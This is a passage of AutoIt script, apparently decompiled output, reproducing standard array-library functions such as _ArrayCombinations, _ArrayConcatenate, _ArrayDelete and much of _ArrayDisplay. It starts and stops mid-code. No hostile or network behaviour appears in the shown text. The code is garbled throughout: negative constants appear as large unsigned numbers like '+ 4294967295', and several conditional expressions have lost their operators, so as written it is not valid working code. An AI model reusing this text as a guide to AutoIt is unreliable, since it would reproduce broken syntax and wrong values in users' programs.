($AARRAY , $UBOUND_COLUMNS ) IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) REDIM $AARRAY [$IDIM_1 ] [$IDIM_2 + 1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $IDIM_2 TO $ICOLUMN + 1 STEP + 4294967295 $AARRAY [$I ] [$J ] = $AARRAY [$I ] [$J + 4294967295 ] NEXT $AARRAY [$I ] [$ICOLUMN ] = "" NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_COLUMNS ) ENDFUNC FUNC _ARRAYCOMBINATIONS (CONST BYREF $AARRAY , $ISET , $SDELIMITER = "" ) IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "" IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $IN = UBOUND ($AARRAY ) LOCAL $IR = $ISET LOCAL $AIDX [$IR ] FOR $I = 0 TO $IR + 4294967295 $AIDX [$I ] = $I NEXT LOCAL $ITOTAL = __ARRAY_COMBINATIONS ($IN , $IR ) LOCAL $ILEFT = $ITOTAL LOCAL $ARESULT [$ITOTAL + 1 ] $ARESULT [0 ] = $ITOTAL LOCAL $ICOUNT = 1 WHILE $ILEFT > 0 __ARRAY_GETNEXT ($IN , $IR , $ILEFT , $ITOTAL , $AIDX ) FOR $I = 0 TO $ISET + 4294967295 $ARESULT [$ICOUNT ] &= $AARRAY [$AIDX [$I ] ] & $SDELIMITER NEXT IF $SDELIMITER <> "" THEN $ARESULT [$ICOUNT ] = STRINGTRIMRIGHT ($ARESULT [$ICOUNT ] , 1 ) $ICOUNT += 1 WEND RETURN $ARESULT ENDFUNC FUNC _ARRAYCONCATENATE (BYREF $AARRAYTARGET , CONST BYREF $AARRAYSOURCE , $ISTART = 0 ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF NOT ISARRAY ($AARRAYTARGET ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) IF NOT ISARRAY ($AARRAYSOURCE ) THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $IDIM_TOTAL_TGT = UBOUND ($AARRAYTARGET , $UBOUND_DIMENSIONS ) LOCAL $IDIM_TOTAL_SRC = UBOUND ($AARRAYSOURCE , $UBOUND_DIMENSIONS ) LOCAL $IDIM_1_TGT = UBOUND ($AARRAYTARGET , $UBOUND_ROWS ) LOCAL $IDIM_1_SRC = UBOUND ($AARRAYSOURCE , $UBOUND_ROWS ) IF $ISTART < 0 OR $ISTART > $IDIM_1_SRC + 4294967295 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) SWITCH $IDIM_TOTAL_TGT CASE 1 IF $IDIM_TOTAL_SRC <> 1 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) REDIM $AARRAYTARGET [$IDIM_1_TGT + $IDIM_1_SRC - $ISTART ] FOR $I = $ISTART TO $IDIM_1_SRC + 4294967295 $AARRAYTARGET [$IDIM_1_TGT + $I - $ISTART ] = $AARRAYSOURCE [$I ] NEXT CASE 2 IF $IDIM_TOTAL_SRC <> 2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IDIM_2_TGT = UBOUND ($AARRAYTARGET , $UBOUND_COLUMNS ) IF UBOUND ($AARRAYSOURCE , $UBOUND_COLUMNS ) <> $IDIM_2_TGT THEN RETURN SETERROR (5 , 0 , + 4294967295 ) REDIM $AARRAYTARGET [$IDIM_1_TGT + $IDIM_1_SRC - $ISTART ] [$IDIM_2_TGT ] FOR $I = $ISTART TO $IDIM_1_SRC + 4294967295 FOR $J = 0 TO $IDIM_2_TGT + 4294967295 $AARRAYTARGET [$IDIM_1_TGT + $I - $ISTART ] [$J ] = $AARRAYSOURCE [$I ] [$J ] NEXT NEXT CASE ELSE RETURN SETERROR (3 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAYTARGET , $UBOUND_ROWS ) ENDFUNC FUNC _ARRAYDELETE (BYREF $AARRAY , $VRANGE ) IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF ISARRAY ($VRANGE ) THEN IF UBOUND ($VRANGE , $UBOUND_DIMENSIONS ) <> 1 OR UBOUND ($VRANGE , $UBOUND_ROWS ) < 2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ELSE LOCAL $INUMBER , $ASPLIT_1 , $ASPLIT_2 $VRANGE = STRINGSTRIPWS ($VRANGE , 8 ) $ASPLIT_1 = STRINGSPLIT ($VRANGE , ";" ) $VRANGE = "" FOR $I = 1 TO $ASPLIT_1 [0 ] IF NOT STRINGREGEXP ($ASPLIT_1 [$I ] , "^\d+(-\d+)?$" ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , "-" ) SWITCH $ASPLIT_2 [0 ] CASE 1 $VRANGE &= $ASPLIT_2 [1 ] & ";" CASE 2 IF NUMBER ($ASPLIT_2 [2 ] ) >= NUMBER ($ASPLIT_2 [1 ] ) THEN $INUMBER = $ASPLIT_2 [1 ] + 4294967295 DO $INUMBER += 1 $VRANGE &= $INUMBER & ";" UNTIL $INUMBER = $ASPLIT_2 [2 ] ENDIF ENDSWITCH NEXT $VRANGE = STRINGSPLIT (STRINGTRIMRIGHT ($VRANGE , 1 ) , ";" ) ENDIF IF $VRANGE [1 ] < 0 OR $VRANGE [$VRANGE [0 ] ] > $IDIM_1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) LOCAL $ICOPYTO_INDEX = 0 SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 FOR $I = 1 TO $VRANGE [0 ] $AARRAY [$VRANGE [$I ] ] = CHRW (64177 ) NEXT FOR $IREADFROM_INDEX = 0 TO $IDIM_1 IF $AARRAY [$IREADFROM_INDEX ] == CHRW (64177 ) THEN CONTINUELOOP ELSE IF $IREADFROM_INDEX <> $ICOPYTO_INDEX THEN $AARRAY [$ICOPYTO_INDEX ] = $AARRAY [$IREADFROM_INDEX ] ENDIF $ICOPYTO_INDEX += 1 ENDIF NEXT REDIM $AARRAY [$IDIM_1 - $VRANGE [0 ] + 1 ] CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 FOR $I = 1 TO $VRANGE [0 ] $AARRAY [$VRANGE [$I ] ] [0 ] = CHRW (64177 ) NEXT FOR $IREADFROM_INDEX = 0 TO $IDIM_1 IF $AARRAY [$IREADFROM_INDEX ] [0 ] == CHRW (64177 ) THEN CONTINUELOOP ELSE IF $IREADFROM_INDEX <> $ICOPYTO_INDEX THEN FOR $J = 0 TO $IDIM_2 $AARRAY [$ICOPYTO_INDEX ] [$J ] = $AARRAY [$IREADFROM_INDEX ] [$J ] NEXT ENDIF $ICOPYTO_INDEX += 1 ENDIF NEXT REDIM $AARRAY [$IDIM_1 - $VRANGE [0 ] + 1 ] [$IDIM_2 + 1 ] CASE ELSE RETURN SETERROR (2 , 0 , FALSE ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_ROWS ) ENDFUNC FUNC _ARRAYDISPLAY (CONST BYREF $AARRAY , $STITLE = DEFAULT , $SARRAYRANGE = DEFAULT , $IFLAGS = DEFAULT , $VUSER_SEPARATOR = DEFAULT , $SHEADER = DEFAULT , $IMAX_COLWIDTH = DEFAULT , $IALT_COLOR = DEFAULT , $HUSER_FUNCTION = DEFAULT ) IF $STITLE = DEFAULT THEN $STITLE = "ArrayDisplay" IF $SARRAYRANGE = DEFAULT THEN $SARRAYRANGE = "" IF $IFLAGS = DEFAULT THEN $IFLAGS = 0 IF $VUSER_SEPARATOR = DEFAULT THEN $VUSER_SEPARATOR = "" IF $SHEADER = DEFAULT THEN $SHEADER = "" IF $IMAX_COLWIDTH = DEFAULT THEN $IMAX_COLWIDTH = 350 IF $IALT_COLOR = DEFAULT THEN $IALT_COLOR = 0 IF $HUSER_FUNCTION = DEFAULT THEN $HUSER_FUNCTION = 0 LOCAL $ITRANSPOSE = BITAND ($IFLAGS , 1 ) LOCAL $ICOLALIGN = BITAND ($IFLAGS , 6 ) LOCAL $IVERBOSE = BITAND ($IFLAGS , 8 ) LOCAL $IBUTTONMARGIN = ((BITAND ($IFLAGS , 32 ) ) (0 ) ((BITAND ($IFLAGS , 16 ) ) (20 ) (40 ) ) ) LOCAL $INOROW = BITAND ($IFLAGS , 64 ) LOCAL $SMSG = "" , $IRET = 1 IF ISARRAY ($AARRAY ) THEN LOCAL $IDIMENSION = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) , $IROWCOUNT = UBOUND ($AARRAY , $UBOUND_ROWS ) , $ICOLCOUNT = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $IDIMENSION > 2 THEN $SMSG = "Larger than 2D array passed to function" $IRET = 2 ENDIF ELSE $SMSG = "No array variable passed to function" ENDIF IF $SMSG THEN IF $IVERBOSE AND MSGBOX ($MB_SYSTEMMODAL + $MB_ICONERROR + $MB_YESNO , "ArrayDisplay Error: " & $STITLE , $SMSG & @CRLF & @CRLF & "Exit the script?" ) = $IDYES THEN EXIT ELSE RETURN SETERROR ($IRET , 0 , "" ) ENDIF ENDIF LOCAL $ICW_COLWIDTH = NUMBER ($VUSER_SEPARATOR ) LOCAL $SAD_SEPARATOR = CHRW (64177 ) LOCAL $SCURR_SEPARATOR = OPT ("GUIDataSeparatorChar" , $SAD_SEPARATOR ) IF $VUSER_SEPARATOR = "" THEN $VUSER_SEPARATOR = $SCURR_SEPARATOR LOCAL $VTMP , $IROWLIMIT = 65525 , $ICOLLIMIT = 250 LOCAL $IDATAROW = $IROWCOUNT LOCAL $IDATACOL = $ICOLCOUNT LOCAL $IITEM_START = 0 , $IITEM_END = $IROWCOUNT + 4294967295 , $ISUBITEM_START = 0 , $ISUBITEM_END = (($IDIMENSION = 2 ) ($ICOLCOUNT + 4294967295 ) (0 ) ) LOCAL $BRANGE_FLAG = FALSE , $AVRANGESPLIT IF $SARRAYRANGE THEN LOCAL $AARRAY_RANGE = STRINGREGEXP ($SARRAYRANGE & "||" , "(?U)(.*)\|" , 3 ) IF $AARRAY_RANGE [0 ] THEN $AVRANGESPLIT = STRINGSPLIT ($AARRAY_RANGE [0 ] , ":" ) IF @ERROR THEN $IITEM_END = NUMBER ($AVRANGESPLIT [1 ] ) ELSE $IITEM_START = NUMBER ($AVRANGESPLIT [1 ] ) $IITEM_END = NUMBER ($AVRANGESPLIT [2 ] ) ENDIF ENDIF IF $IITEM_START > $IITEM_END THEN $VTMP = $IITEM_START $IITEM_START = $IITEM_END $IITEM_END = $VTMP ENDIF IF $IITEM_START < 0 THEN $IITEM_START = 0 IF $IITEM_END > $IROWCOUNT + 4294967295 THEN $IITEM_END = $IROWCOUNT + 4294967295 IF $IITEM_START <> 0 OR $IITEM_END <> $IROWCOUNT + 4294967295 THEN $BRANGE_FLAG = TRUE IF $IDIMENSION = 2 AND $AARRAY_RANGE [1 ] THEN $AVRANGESPLIT = STRINGSPLIT ($AARRAY_RANGE [1 ] , ":" ) IF @ERROR THEN $ISUBITEM_END = NUMBER ($AVRANGESPLIT [1 ] ) ELSE $ISUBITEM_START = NUMBER ($AVRANGESPLIT [1 ] ) $ISUBITEM_END = NUMBER ($AVRANGESPLIT [2 ] ) ENDIF IF $ISUBITEM_START > $ISUBITEM_END THEN $VTMP = $ISUBITEM_START $ISUBITEM_START = $ISUBITEM_END $ISUBITEM_END = $VTMP ENDIF IF $ISUBITEM_START < 0 THEN $ISUBITEM_START = 0 IF $ISUBITEM_END > $ICOLCOUNT + 4294967295 THEN $ISUBITEM_END = $ICOLCOUNT + 4294967295 IF $ISUBITEM_START <> 0 OR $ISUBITEM_END <> $ICOLCOUNT + 4294967295 THEN $BRANGE_FLAG = TRUE ENDIF ENDIF LOCAL $SDISPLAYDATA = "[" & $IDATAROW LOCAL $BTRUNCATED = FALSE IF $ITRANSPOSE THEN IF $IITEM_END - $IITEM_START > $ICOLLIMIT THEN $BTRUNCATED = TRUE $IITEM_END = $IITEM_START + $ICOLLIMIT + 4294967295 ENDIF ELSE IF $IITEM_END - $IITEM_START > $IROWLIMIT THEN $BTRUNCATED = TRUE $IITEM_END = $IITEM_START + $IROWLIMIT + 4294967295 ENDIF ENDIF IF $BTRUNCATED THEN $SDISPLAYDATA &= "*]" ELSE $SDISPLAYDATA &= "]" ENDIF IF $IDIMENSION = 2 THEN $SDISPLAYDATA &= " [" & $IDATACOL IF $ITRANSPOSE THEN IF $ISUBITEM_END - $ISUBITEM_START > $IROWLIMIT THEN $BTRUNCATED = TRUE $ISUBITEM_END = $ISUBITEM_START + $IROWLIMIT + 4294967295 ENDIF ELSE IF $ISUBITEM_END - $ISUBITEM_START > $ICOLLIMIT THEN $BTRUNCATED = TRUE $ISUBITEM_END = $ISUBITEM_START + $ICOLLIMIT + 4294967295 ENDIF ENDIF IF $BTRUNCATED THEN $SDISPLAYDATA &= "*]" ELSE $SDISPLAYDATA &= "]" ENDIF ENDIF LOCAL $STIPDATA = "" IF $BTRUNCATED THEN $STIPDATA &= "Truncated" IF $BRANGE_FLAG THEN IF $STIPDATA THEN $STIPDATA &= " - " $STIPDATA &= "Range set" ENDIF IF $ITRANSPOSE THEN IF $STIPDATA THEN $STIPDATA &= " - " $STIPDATA &= "Transposed" ENDIF LOCAL $ASHEADER = STRINGSPLIT ($SHEADER , $SCURR_SEPARATOR , $STR_NOCOUNT ) IF UBOUND ($ASHEADER ) = 0 THEN LOCAL $ASHEADER [1 ] = ["" ] $SHEADER = "Row" LOCAL $IINDEX = $ISUBITEM_START IF $ITRANSPOSE THEN FOR $J = $IITEM_START TO $IITEM_END $SHEADER &= $SAD_SEPARATOR & "Col " & $J NEXT ELSE IF $ASHEADER [0 ] THEN FOR $IINDEX = $ISUBITEM_START TO $ISUBITEM_END IF $IINDEX >= UBOUND ($ASHEADER ) THEN EXITLOOP $SHEADER &= $SAD_SEPARATOR & $ASHEADER [$IINDEX ] NEXT ENDIF FOR $J = $IINDEX TO $ISUBITEM_END $SHEADER &= $SAD_SEPARATOR & "Col " & $J NEXT ENDIF IF $INOROW THEN $SHEADER = STRINGTRIMLEFT ($SHEADER , 4 ) IF $IVERBOSE AND ($IITEM_END - $IITEM_START + 1 ) * ($ISUBITEM_END - $ISUBITEM_START + 1 ) > 10000 THEN SPLASHTEXTON ("ArrayDisplay" , "Preparing display" & @CRLF & @CRLF & "Please be patient" , 300 , 100 ) ENDIF LOCAL $IBUFFER = 4094 IF $ITRANSPOSE THEN $VTMP = $IITEM_START $IITEM_START = $ISUBITEM_START $ISUBITEM_START = $VTMP $VTMP = $IITEM_END $IITEM_END = $ISUBITEM_END $ISUBITEM_END = $VTMP ENDIF LOCAL $AVARRAYTEXT [$IITEM_END - $IITEM_START + 1 ] FOR $I = $IITEM_START TO $IITEM_END IF NOT $INOROW THEN $AVARRAYTEXT [$I - $IITEM_START ] = "[" & $I & "]" FOR $J = $ISUBITEM_START TO $ISUBITEM_END IF $IDIMENSION = 1 THEN IF $ITRANSPOSE THEN SWITCH VARGETTYPE ($AARRAY [$J ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$J ] ENDSWITCH ELSE SWITCH VARGETTYPE ($AARRAY [$I ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$I ] ENDSWITCH ENDIF ELSE IF $ITRANSPOSE THEN SWITCH VARGETTYPE ($AARRAY [$J ] [$I ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$J ] [$I ] ENDSWITCH ELSE SWITCH VARGETTYPE ($AARRAY [$I ] [$J ] ) CASE "Array" $VTMP = "{Array}" CASE ELSE $VTMP = $AARRAY [$I ] [$J ] ENDSWITCH ENDIF ENDIF IF STRINGLEN ($VTMP ) > $IBUFFER THEN $VTMP = STRINGLEFT ($VTMP , $IBUFFER ) $AVARRAYTEXT [$I - $IITEM_START ] &= $SAD_SEPARATOR & $VTMP NEXT IF $INOROW THEN $AVARRAYTEXT [$I - $IITEM_START ] = STRINGTRIMLEFT ($AVARRAYTEXT [$I - $IITEM_START ] , 1 ) NEXT LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKBOTTOM = 64 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKBORDERS = 102 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKHEIGHT = 512 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKLEFT = 2 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKRIGHT = 4 LOCAL CONST $_ARRAYCONSTANT_GUI_DOCKHCENTER = 8 LOCAL CONST $_ARRAYCONSTANT_GUI_EVENT_CLOSE = + 4294967293 LOCAL CONST $_ARRAYCONSTANT_GUI_FOCUS = 256 LOCAL CONST $_ARRAYCONSTANT_GUI_BKCOLOR_LV_ALTERNATE = 4261412864 LOCAL CONST $_ARRAYCONSTANT_SS_CENTER = 1 LOCAL CONST $_ARRAYCONSTANT_SS_CENTERIMAGE = 512 LOCAL CONST $_ARRAYCONSTANT_LVM_GETITEMCOUNT = (4096 + 4 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETITEMRECT = (4096 + 14 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETCOLUMNWIDTH = (4096 + 29 ) LOCAL CONST $_ARRAYCONSTANT_LVM_SETCOLUMNWIDTH = (4096 + 30 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETITEMSTATE = (4096 + 44 ) LOCAL CONST $_ARRAYCONSTANT_LVM_GETSELECTEDCOUNT = (4096 + 50 ) LOCAL CONST $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE = (4096 + 54 ) LOCAL CONST $_ARRAYCONSTANT_LVS_EX_GRIDLINES = 1 LOCAL CONST $_ARRAYCONSTANT_LVIS_SELECTED = 2 LOCAL CONST $_ARRAYCONSTANT_LVS_SHOWSELALWAYS = 8 LOCAL CONST $_ARRAYCONSTANT_LVS_EX_FULLROWSELECT = 32 LOCAL CONST $_ARRAYCONSTANT_WS_EX_CLIENTEDGE = 512 LOCAL CONST $_ARRAYCONSTANT_WS_MAXIMIZEBOX = 65536 LOCAL CONST $_ARRAYCONSTANT_WS_MINIMIZEBOX = 131072 LOCAL CONST $_ARRAYCONSTANT_WS_SIZEBOX = 262144 LOCAL CONST $_ARRAYCONSTANT_WM_SETREDRAW = 11 LOCAL CONST $_ARRAYCONSTANT_LVSCW_AUTOSIZE = + 4294967295 LOCAL $ICOORDMODE = OPT ("GUICoordMode" , 1 ) LOCAL $IORGWIDTH = 210 , $IHEIGHT = 200 , $IMINSIZE = 250 LOCAL $HGUI = GUICREATE ($STITLE , $IORGWIDTH , $IHEIGHT , DEFAULT , DEFAULT , BITOR ($_ARRAYCONSTANT_WS_SIZEBOX , $_ARRAYCONSTANT_WS_MINIMIZEBOX , $_ARRAYCONSTANT_WS_MAXIMIZEBOX ) ) LOCAL $AIGUISIZE = WINGETCLIENTSIZE ($HGUI ) LOCAL $IBUTTONWIDTH_2 = $AIGUISIZE [0 ] / 2 LOCAL $IBUTTONWIDTH_3 = $AIGUISIZE [0 ] / 3 LOCAL $IDLISTVIEW = GUICTRLCREATELISTVIEW ($SHEADER , 0 , 0 , $AIGUISIZE [0 ] , $AIGUISIZE [1 ] - $IBUTTONMARGIN , $_ARRAYCONSTANT_LVS_SHOWSELALWAYS ) GUICTRLSETBKCOLOR ($IDLISTVIEW , $_ARRAYCONSTANT_GUI_BKCOLOR_LV_ALTERNATE ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE , $_ARRAYCONSTANT_LVS_EX_GRIDLINES , $_ARRAYCONSTANT_LVS_EX_GRIDLINES ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE , $_ARRAYCONSTANT_LVS_EX_FULLROWSELECT , $_ARRAYCONSTANT_LVS_EX_FULLROWSELECT ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETEXTENDEDLISTVIEWSTYLE , $_ARRAYCONSTANT_WS_EX_CLIENTEDGE , $_ARRAYCONSTANT_WS_EX_CLIENTEDGE ) LOCAL $IDCOPY_ID = 9999 , $IDCOPY_DATA = 99999 , $IDDATA_LABEL = 99999 , $IDUSER_FUNC = 99999 , $IDEXIT_SCRIPT = 99999 IF $IBUTTONMARGIN THEN $IDCOPY_ID = GUICTRLCREATEBUTTON ("Copy Data && Hdr/Row" , 0 , $AIGUISIZE [1 ] - $IBUTTONMARGIN , $IBUTTONWIDTH_2 , 20 ) $IDCOPY_DATA = GUICTRLCREATEBUTTON ("Copy Data Only" , $IBUTTONWIDTH_2 , $AIGUISIZE [1 ] - $IBUTTONMARGIN , $IBUTTONWIDTH_2 , 20 ) IF $IBUTTONMARGIN = 40 THEN LOCAL $IBUTTONWIDTH_VAR = $IBUTTONWIDTH_2 LOCAL $IOFFSET = $IBUTTONWIDTH_2 IF ISFUNC ($HUSER_FUNCTION ) THEN $IDUSER_FUNC = GUICTRLCREATEBUTTON ("Run User Func" , $IBUTTONWIDTH_3 , $AIGUISIZE [1 ] + 4294967276 , $IBUTTONWIDTH_3 , 20 ) $IBUTTONWIDTH_VAR = $IBUTTONWIDTH_3 $IOFFSET = $IBUTTONWIDTH_3 * 2 ENDIF $IDEXIT_SCRIPT = GUICTRLCREATEBUTTON ("Exit Script" , $IOFFSET , $AIGUISIZE [1 ] + 4294967276 , $IBUTTONWIDTH_VAR , 20 ) $IDDATA_LABEL = GUICTRLCREATELABEL ($SDISPLAYDATA , 0 , $AIGUISIZE [1 ] + 4294967276 , $IBUTTONWIDTH_VAR , 18 , BITOR ($_ARRAYCONSTANT_SS_CENTER , $_ARRAYCONSTANT_SS_CENTERIMAGE ) ) SELECT CASE $BTRUNCATED OR $ITRANSPOSE OR $BRANGE_FLAG GUICTRLSETCOLOR ($IDDATA_LABEL , 16711680 ) GUICTRLSETTIP ($IDDATA_LABEL , $STIPDATA ) ENDSELECT ENDIF ENDIF GUICTRLSETRESIZING ($IDLISTVIEW , $_ARRAYCONSTANT_GUI_DOCKBORDERS ) GUICTRLSETRESIZING ($IDCOPY_ID , $_ARRAYCONSTANT_GUI_DOCKLEFT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDCOPY_DATA , $_ARRAYCONSTANT_GUI_DOCKRIGHT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDDATA_LABEL , $_ARRAYCONSTANT_GUI_DOCKLEFT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDUSER_FUNC , $_ARRAYCONSTANT_GUI_DOCKHCENTER + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSETRESIZING ($IDEXIT_SCRIPT , $_ARRAYCONSTANT_GUI_DOCKRIGHT + $_ARRAYCONSTANT_GUI_DOCKBOTTOM + $_ARRAYCONSTANT_GUI_DOCKHEIGHT ) GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_WM_SETREDRAW , 0 , 0 ) LOCAL $IDITEM FOR $I = 0 TO UBOUND ($AVARRAYTEXT ) + 4294967295 $IDITEM = GUICTRLCREATELISTVIEWITEM ($AVARRAYTEXT [$I ] , $IDLISTVIEW ) IF $IALT_COLOR THEN GUICTRLSETBKCOLOR ($IDITEM , $IALT_COLOR ) ENDIF NEXT IF $ICOLALIGN THEN LOCAL CONST $_ARRAYCONSTANT_LVCF_FMT = 1 LOCAL CONST $_ARRAYCONSTANT_LVM_SETCOLUMNW = (4096 + 96 ) LOCAL $TCOLUMN = DLLSTRUCTCREATE ("uint Mask;int Fmt;int CX;ptr Text;int TextMax;int SubItem;int Image;int Order;int cxMin;int cxDefault;int cxIdeal" ) DLLSTRUCTSETDATA ($TCOLUMN , "Mask" , $_ARRAYCONSTANT_LVCF_FMT ) DLLSTRUCTSETDATA ($TCOLUMN , "Fmt" , $ICOLALIGN / 2 ) LOCAL $PCOLUMN = DLLSTRUCTGETPTR ($TCOLUMN ) FOR $I = 1 TO $ISUBITEM_END - $ISUBITEM_START + 1 GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETCOLUMNW , $I , $PCOLUMN ) NEXT ENDIF GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_WM_SETREDRAW , 1 , 0 ) LOCAL $IBORDER = 45 IF UBOUND ($AVARRAYTEXT ) > 20 THEN $IBORDER += 20 ENDIF LOCAL $IWIDTH = $IBORDER , $ICOLWIDTH = 0 , $AICOLWIDTH [$ISUBITEM_END - $ISUBITEM_START + 2 ] , $IMIN_COLWIDTH = 55 FOR $I = 0 TO $ISUBITEM_END - $ISUBITEM_START + 1 GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETCOLUMNWIDTH , $I , $_ARRAYCONSTANT_LVSCW_AUTOSIZE ) $ICOLWIDTH = GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_GETCOLUMNWIDTH , $I , 0 ) IF $ICOLWIDTH < $IMIN_COLWIDTH THEN GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETCOLUMNWIDTH , $I , $IMIN_COLWIDTH ) $ICOLWIDTH = $IMIN_COLWIDTH ENDIF $IWIDTH += $ICOLWIDTH $AICOLWIDTH [$I ] = $ICOLWIDTH NEXT IF $INOROW THEN $IWIDTH -= 55 IF $IWIDTH > @DESKTOPWIDTH + 4294967196 THEN $IWIDTH = $IBORDER FOR $I = 0 TO $ISUBITEM_END - $ISUBITEM_START + 1 IF $AICOLWIDTH [$I ] > $IMAX_COLWIDTH THEN GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_SETCOLUMNWIDTH , $I , $IMAX_COLWIDTH ) $IWIDTH += $IMAX_COLWIDTH ELSE $IWIDTH += $AICOLWIDTH [$I ] ENDIF NEXT ENDIF IF $IWIDTH > @DESKTOPWIDTH + 4294967196 THEN $IWIDTH = @DESKTOPWIDTH + 4294967196 ELSEIF $IWIDTH < $IMINSIZE THEN $IWIDTH = $IMINSIZE ENDIF LOCAL $TRECT = DLLSTRUCTCREATE ("struct; long Left;long Top;long Right;long Bottom; endstruct" ) DLLCALL ("user32.dll" , "struct*" , "SendMessageW" , "hwnd" , GUICTRLGETHANDLE ($IDLISTVIEW ) , "uint" , $_ARRAYCONSTANT_LVM_GETITEMRECT , "wparam" , 0 , "struct*" , $TRECT ) LOCAL $AIWIN_POS = WINGETPOS ($HGUI ) LOCAL $AILV_POS = CONTROLGETPOS ($HGUI , "" , $IDLISTVIEW ) $IHEIGHT = ((UBOUND ($AVARRAYTEXT ) + 2 ) * (DLLSTRUCTGETDATA ($TRECT , "Bottom" ) - DLLSTRUCTGETDATA ($TRECT , "Top" ) ) ) + $AIWIN_POS [3 ] - $AILV_POS [3 ] IF $IHEIGHT > @DESKTOPHEIGHT + 4294967196 THEN $IHEIGHT = @DESKTOPHEIGHT + 4294967196 ELSEIF $IHEIGHT < $IMINSIZE THEN $IHEIGHT = $IMINSIZE ENDIF IF $IVERBOSE THEN SPLASHOFF () GUISETSTATE (@SW_HIDE , $HGUI ) WINMOVE ($HGUI , "" , (@DESKTOPWIDTH - $IWIDTH ) / 2 , (@DESKTOPHEIGHT - $IHEIGHT ) / 2 , $IWIDTH , $IHEIGHT ) GUISETSTATE (@SW_SHOW , $HGUI ) LOCAL $IONEVENTMODE = OPT ("GUIOnEventMode" , 0 ) , $IMSG WHILE 1 $IMSG = GUIGETMSG () SWITCH $IMSG CASE $_ARRAYCONSTANT_GUI_EVENT_CLOSE EXITLOOP CASE $IDCOPY_ID , $IDCOPY_DATA LOCAL $ISEL_COUNT = GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_GETSELECTEDCOUNT , 0 , 0 ) IF $IVERBOSE AND (NOT $ISEL_COUNT ) AND ($IITEM_END - $IITEM_START ) * ($ISUBITEM_END - $ISUBITEM_START ) > 10000 THEN SPLASHTEXTON ("ArrayDisplay" , "Copying data" & @CRLF & @CRLF & "Please be patient" , 300 , 100 ) ENDIF LOCAL $SCLIP = "" , $SITEM , $ASPLIT FOR $I = 0 TO $IITEM_END - $IITEM_START IF $ISEL_COUNT AND NOT (GUICTRLSENDMSG ($IDLISTVIEW , $_ARRAYCONSTANT_LVM_GETITEMSTATE , $I , $_ARRAYCONSTANT_LVIS_SELECTED ) ) THEN CONTINUELOOP ENDIF $SITEM = $AVARRAYTEXT [$I ] IF $IMSG = $IDCOPY_DATA THEN $SITEM = STRINGREGEXPREPLACE ($SITEM , "^\[\d+\].(.*)$" , "$1" ) ENDIF IF $ICW_COLWIDTH THEN $ASPLIT = STRINGSPLIT ($SITEM , $SAD_SEPARATOR ) $SITEM = "" FOR $J = 1 TO $ASPLIT [0 ] $SITEM &= STRINGFORMAT ("%-" & 